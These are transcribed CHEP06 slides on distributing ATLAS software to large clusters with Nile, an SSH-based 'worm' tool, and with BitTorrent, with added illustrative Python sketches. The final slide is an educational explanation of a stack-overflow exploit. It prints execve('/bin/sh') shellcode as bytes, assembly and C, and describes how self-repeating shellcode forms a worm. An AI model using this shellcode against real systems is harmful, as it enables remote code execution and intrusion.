1
Worm and Peer To Peer Tools for Distribution and Management of ATLAS SW on TDAQ Clusters
Hegoi Garitaonandia (hegoi@ifae.es), IFAE, Barcelona, Spain
Haimo Zobernig, University of Wisconsin, Madison, USA
02/14/2006, CHEP06, TIFR, Mumbai
2
Outline
● Introduction and Motivation
● Nile, a Worm for Management and Distribution
● BitTorrent, a P2P for Distribution
● SW Distribution in ATLAS TDAQ
● Nile as Command Transport: Diagnostic Tools
● Conclusions and Further Work
3
Introduction and Motivation
● ATLAS SW: 6 GBytes per release. Large scale tests: over 600 nodes.
● Some clusters outside CERN have no SW distribution tool available.
● Heterogeneous clusters.
● A lightweight tool is needed.
● Two alternatives tested, with two different technologies:
– A Worm: Nile
– A Peer To Peer: BitTorrent
● Nile's additional useful feature:
– Propagation of executables.
4
Nile, a Worm for Management and Distribution
● A script that uses worm technology to:
– execute commands on a list of hosts
– or copy files to/from them.
● Creates a hierarchical control network via worm propagation.
● It takes as input:
– a list of hosts
– a list of hosts & propagation paths.
● Shutdown and network error recovery algorithm:
– Reliable
– Centralized logs
● Based on Distribulator, Rgang and the Metasploit Project, but written from scratch.
● http://nile.ifae.es
5
Nile, a Worm for Management and Distribution: Propagation of Executables
● Features:
– Execution of shell commands.
– Perl script upload.
– Run different commands on different computers.
● Recursive procedure:
– Propagation with SSH transport to N machines (in parallel).
– Nile protocol: inherit the SSH connection, receive a packet with routing info and payload.
– Launch the specified executable.
– Propagation to the next machines.
● Speed benefits in a 600 node cluster:
– The maximum number of parallel SSH processes per machine is 25 in both cases.
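The recursive procedure above can be illustrated with a small simulation. This is only a sketch under stated assumptions, not Nile's actual code: the helper names `split_hosts` and `propagate` are hypothetical, the host list is simply cut into contiguous groups, and the SSH hop is replaced by a log entry. The fan-out of 25 and the 600 hosts are the figures quoted on the slide.

```python
def split_hosts(hosts, fanout):
    """Split hosts into at most `fanout` contiguous, near-equal groups."""
    if not hosts:
        return []
    n_groups = min(fanout, len(hosts))
    size, extra = divmod(len(hosts), n_groups)
    groups, start = [], 0
    for i in range(n_groups):
        end = start + size + (1 if i < extra else 0)
        groups.append(hosts[start:end])
        start = end
    return groups


def propagate(hosts, fanout, depth=1, log=None):
    """Simulate the recursive hop and return a list of (host, depth) pairs."""
    if log is None:
        log = []
    for group in split_hosts(hosts, fanout):
        head, rest = group[0], group[1:]
        # Stand-in for: open an SSH connection to `head` and launch the executable.
        log.append((head, depth))
        # `head` then forwards the payload to the remaining hosts of its group.
        propagate(rest, fanout, depth + 1, log)
    return log


hosts = [f"node{i:03d}" for i in range(600)]  # hypothetical host names
log = propagate(hosts, fanout=25)
max_depth = max(depth for _, depth in log)
print(len(log), "hosts reached in", max_depth, "hops")
```

Under these assumptions no machine opens more than 25 connections, and the depth of the tree grows only logarithmically with the number of hosts, which is where the speed benefit over a flat parallel copy from a single machine comes from.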
6
Nile, a Worm for Management and Distribution: File Distribution and Synchronization
● Features:
– Incremental synchronization of the directories of many computers with a directory on the main computer.
– Copy files from many computers to the main one.
– Via RSYNC on top of SSH or RSYNC on top of TCP.
● Procedure:
– Similar to Nile in copy mode.
– But each node synchronizes before the worm jumps to the next hosts.
● Throughput benefits: [plot not preserved in this transcript]
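The idea of incremental synchronization can be sketched as a comparison of two file manifests. This is a deliberate simplification and not how rsync works internally (rsync normally uses a size and modification-time quick check plus delta transfer). The helper names `manifest` and `plan_sync` and the sample file names are hypothetical, and deleting extraneous files on the replica is an assumption rather than documented Nile behaviour.

```python
import hashlib


def manifest(files):
    """Map each relative path to the SHA-1 digest of its contents."""
    return {path: hashlib.sha1(data).hexdigest() for path, data in files.items()}


def plan_sync(master, replica):
    """Return (to_copy, to_delete) needed to make `replica` match `master`."""
    m, r = manifest(master), manifest(replica)
    # Copy files that are missing on the replica or whose contents differ.
    to_copy = sorted(p for p in m if r.get(p) != m[p])
    # Assumption: files that no longer exist on the master are removed.
    to_delete = sorted(p for p in r if p not in m)
    return to_copy, to_delete


# In-memory stand-ins for a directory on the main computer and on one node.
master = {"bin/run": b"v2", "lib/a.so": b"same", "etc/cfg": b"new"}
replica = {"bin/run": b"v1", "lib/a.so": b"same", "old/tmp": b"stale"}

to_copy, to_delete = plan_sync(master, replica)
print("copy:", to_copy)
print("delete:", to_delete)
```

Only the changed and missing files are transferred, so a node that already holds most of a release needs far less than a full copy.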
7
A P2P for File Distribution: BitTorrent (1)
● A distributed file sharing SW which adapts to the network topology.
● Architecture:
– Peers
– Seeder
– Metainformation file:
   ● File pieces information.
   ● Pointer to the tracker.
– Tracker
– An adaptive algorithm
● Nile can be used to launch, check, monitor, and stop the BitTorrent network.
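The two items carried by the metainformation file (piece information and a pointer to the tracker) can be sketched as follows. The dictionary keys `announce`, `info`, `name`, `length`, `piece length` and `pieces` are those of the BitTorrent metainfo format for a single file. The function name `build_metainfo`, the file name, the tracker URL and the 256 KiB piece size are assumptions made for illustration. A real .torrent file is this dictionary in bencoded form, which is omitted here.

```python
import hashlib


def build_metainfo(name, data, tracker_url, piece_length=256 * 1024):
    """Build an (un-bencoded) single-file metainfo dictionary."""
    # One 20-byte SHA-1 digest per piece, concatenated into a single byte string.
    pieces = b"".join(
        hashlib.sha1(data[i:i + piece_length]).digest()
        for i in range(0, len(data), piece_length)
    )
    return {
        "announce": tracker_url,  # pointer to the tracker
        "info": {                 # file pieces information
            "name": name,
            "length": len(data),
            "piece length": piece_length,
            "pieces": pieces,
        },
    }


data = bytes(1_000_000)  # stand-in for the container file
meta = build_metainfo(
    "atlas_sw.img",                              # hypothetical file name
    data,
    "http://tracker.example.org:6969/announce",  # hypothetical tracker URL
)
n_pieces = len(meta["info"]["pieces"]) // 20
print(n_pieces, "pieces")
```

Each peer verifies a downloaded piece against its digest before offering it to others, which is what lets peers exchange pieces with each other instead of all fetching from the seeder.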
8
A P2P for File Distribution: BitTorrent (2)
9
Quattor
● Quattor is a system administration toolkit for:
– automated installation
– configuration and management of clusters
● Publish & Pull architecture.
● Can be configured with many SW repositories.
● But it wasn't used in these tests:
– Its behaviour was emulated.
– Simplest configuration: 1 repository.
– HTTP, no Squid caches.
10
File Distribution in ATLAS TDAQ
● Two big tests with these tools so far:
– Large scale tests (see D.Burckhart's talk)
– Pre-Series (see G.Unel's talk), (see M.Dobson's talk)
● Different working conditions.
● Only one direct comparison.
● Though some aspects cannot really be compared.
11
SW Distribution in Large Scale Tests with Unknown Network Topology
● A 2 GByte container file with the ATLAS TDAQ SW had to be installed locally on 600 machines at CERN.
● The computers were spread over different physical locations:
– Virtual cluster.
– No clear knowledge of the network topology.
● There were incompatibilities between the packaging systems:
– The ATLAS SW one.
– The official one in the cluster, RPM.
● The distribution of this file was an appropriate task for a P2P:
– BitTorrent 3.4
12
SW Distribution in Large Scale Tests with Unknown Network Topology
● BitTorrent:
– Adapted to the network topology.
– Performed better.
● With BT, when the number of nodes was increased:
– The corresponding switches from their labs were added.
– The throughput increased.
● The bottleneck for the parallel copy was the closest router:
– A 100 Mbps router in the first tests, then a 200 Mbps one.
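A rough estimate shows why the closest router limits the parallel copy. The sketch below assumes that every one of the 600 copies of the 2 GByte file crosses that router exactly once, that the link is fully used, that protocol overhead is negligible, and that decimal units apply (1 GByte = 10^9 bytes). These are simplifying assumptions and not measurements from the tests; the function name `copy_time_hours` is hypothetical.

```python
def copy_time_hours(n_nodes, file_gbytes, link_mbps):
    """Lower bound on the time to push n_nodes copies through one link."""
    total_bits = n_nodes * file_gbytes * 1e9 * 8
    seconds = total_bits / (link_mbps * 1e6)
    return seconds / 3600


t100 = copy_time_hours(600, 2, 100)  # first tests: 100 Mbps router
t200 = copy_time_hours(600, 2, 200)  # later tests: 200 Mbps router
print(f"100 Mbps: {t100:.1f} h, 200 Mbps: {t200:.1f} h")
```

With these assumptions the parallel copy needs more than a day at 100 Mbps and about half that at 200 Mbps. A peer-to-peer transfer avoids this bound because most pieces are exchanged between peers and do not cross the bottleneck router once per node.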
13
SW Distribution in Pre-Series with Known Network Topology
● Pre-Series is a small scale (10%) version of the final ATLAS TDAQ system (70 nodes).
● Its control network is the one shown in the slide's figure, with N=4 and a different M for each switch.
● Nile is being used to synchronize the ATLAS SW, locally installed on all the machines with disk.
● Some performance measurements were taken (4 per point) with BT, Nile, and an emulation of a simple configuration of Quattor, for N=3 and M=4, 6 and 8.
14
SW Distribution in Pre-Series with Known Network Topology
● Nile 2.0.2 configured in two stages:
– Performed the best of all three.
– Throughput was close to the expected value.
● The parallel copy can be understood as the simplest Quattor configuration:
– Only one SW repository, HTTP, no Squid caches.
15
Nile as Command Transport: TDAQ Diagnostic Tools
● Nile in execute mode can be used as a transport mechanism by other tools:
– Reliable.
– Centralized logs.
● A set of tools, currently under development, is being built on top of Nile.
● Their objective is to provide, quickly:
– Unix resource monitoring.
– TDAQ infrastructure monitoring and diagnostics.
– Deallocation of resources.
– Diagnostics, etc.
16
Conclusions
● When no SW package distribution tool is available:
– A (temporary?) solution is needed.
– P2P & Worm.
● The P2P BitTorrent:
– Its adaptability makes it suitable for unknown network topologies.
– Nile or a similar tool must be used to launch BT.
● The worm Nile:
– Performs better for known & more symmetrical network topologies.
– It can synchronize incrementally.
● Nile alone, or the combination of both, for:
– Future large scale tests outside CERN.
– Network commissioning.
● Nile is useful for command transport:
– Applications on top of it.
– TDAQ specific applications.
17
Further Work
● Keep improving Nile.
● Develop TDAQ specific tools on top of Nile.
● Integration of BitTorrent with Quattor:
– Both pull oriented.
● File system on top of P2P?
18
?
● http://nile.ifae.es
● http://www.bittorrent.com
● http://quattor.org
● http://fermitools.fnal.gov/rgang
● http://www.metasploit.com
● http://distribulator.sourceforge.net
19
Worms in a Nutshell: Hacking for Dummies
Exploiting a C/C++ Stack Overflow Bug

Process memory (figure): Text, Data, Stack. Stack contents, from higher to lower addresses:
– environment variables
– main's stack frame
– parameters for the function call
– return address (replaced by the new return address)
– saved frame pointer
– local vars: e.g. a char buffer (lower address)

The vulnerable program:

    main(){ buggy(); }
    buggy(){ char buf[12]; gets(buf); }   /* gets() does not check the buffer size */

3 ways of saying the same thing:

1) As a byte string:

    char shellcode[] =
      "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
      "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
      "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
      "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";

2) As assembly. The jmp/call/popl sequence gets a reference to the string (the code needs to know where it is being executed):

    jmp 0x2a                # 3 bytes
    popl %esi               # 1 byte
    movl %esi,0x8(%esi)     # 3 bytes
    movb $0x0,0x7(%esi)     # 4 bytes
    movl $0x0,0xc(%esi)     # 7 bytes
    movl $0xb,%eax          # 5 bytes
    movl %esi,%ebx          # 2 bytes
    leal 0x8(%esi),%ecx     # 3 bytes
    leal 0xc(%esi),%edx     # 3 bytes
    int $0x80               # 2 bytes
    movl $0x1, %eax         # 5 bytes
    movl $0x0, %ebx         # 5 bytes
    int $0x80               # 2 bytes
    call -0x2f              # 5 bytes
    .string \"/bin/sh\"     # 8 bytes

3) As C:

    name[0] = "/bin/sh";
    name[1] = NULL;
    execve(name[0], name, NULL);
    exit(0);

The exploit: 1) negotiate with the program's protocol, 2) send the shellcode.
If, instead of execve("/bin/sh"), the shellcode repeats (1) & (2): WORM